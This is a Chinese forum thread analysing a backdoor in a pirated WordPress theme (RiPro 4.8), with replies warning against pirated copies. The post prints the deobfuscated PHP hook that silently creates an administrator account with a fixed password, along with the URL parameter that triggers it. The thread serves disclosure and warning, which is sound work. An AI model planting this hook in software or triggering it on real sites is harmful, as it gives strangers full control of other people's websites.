网站 › 『病毒分析区』 › 关于本站ripro主题4.8版本后门分析

longgod 发表于 2019-12-16 22:41

关于本站ripro主题4.8版本后门分析

本帖最后由 longgod 于 2019-12-17 00:42 编辑

原文链接：https://www.52pojie.cn/thread-1066825-1-1.html
下载后用D盾扫描

发现有加密文件，用Notepad++查看

破解混淆加密后得到源文件

经查看发现后门代码

add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
      if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
                require('wp-includes/registration.php');
                if (!username_exists('backdoor')) { //检测是否存在backdoor账户
                        $user_id = wp_create_user('backdoor', '123456'); //创建账户
                        $user = new WP_User($user_id);
                        $user->set_role('administrator'); //设置为管理员权限
                }
      }
}
使用http(s)://你的域名/?backdoor=go访问，
自动创建用户名为backdoor密码为123456的管理员账户
本地测试





成功登录后台



推荐这种涉及到支付的主题还是用正版，盗版的就如作者所说，很容易被添加后门。
毕竟没有真正免费的午餐。
解密后的文件

后门代码已注释，位于412-423行

我写的关于本次后门的解密方法：PHP【简单混淆加密】解密 https://www.52pojie.cn/thread-1074918-1-1.html

Hmily 发表于 2019-12-16 23:05

感谢，已ban并提醒大家注意。

ymtsrj 发表于 2021-11-7 18:41

这程序官方也没多少钱，大家为什么就不买正版呢？哎。。。。。才599元，为了作者能更和程序能更好的活下去，我就买了正版 ，在某宝看到过便宜的，没买，要是官方卖几千块钱，我会考虑在某宝买，关键是官方才卖599元，一个真正想做站的人，我想都会考虑官方的版本！

ids 发表于 2019-12-16 22:58

分享加后门不要脸啊。。。所以说有加密的脚本，还真要多留个心眼。感谢楼主分享。

Mee.Love.R 发表于 2019-12-16 23:00

{:1_921:}{:1_921:}{:1_921:}{:1_921:}{:1_921:}楼主很厉害！

软件我来了 发表于 2019-12-16 23:10

果然有后门啊，而且那个好像也不是真正的4.8版本。

xiajin 发表于 2019-12-16 23:21

楼主，怎么解密的啊，我想知道这块

暮色渐蓝 发表于 2019-12-16 23:23

丧心病狂啊，我赶紧试试，果然有

肖伟95 发表于 2019-12-16 23:28

球解密版，要不然用不了😊

skyuce 发表于 2019-12-16 23:35

我不是在意什么人，我只是想说...放后门真的用backdoor这么显眼的吗？

rsgdxp 发表于 2019-12-17 01:48

4.6版的好像也有几个帖子 。。。是故意加后门的还是不知分享的。。。故意加后门太可耻。。。。。。

查看完整版本: 关于本站ripro主题4.8版本后门分析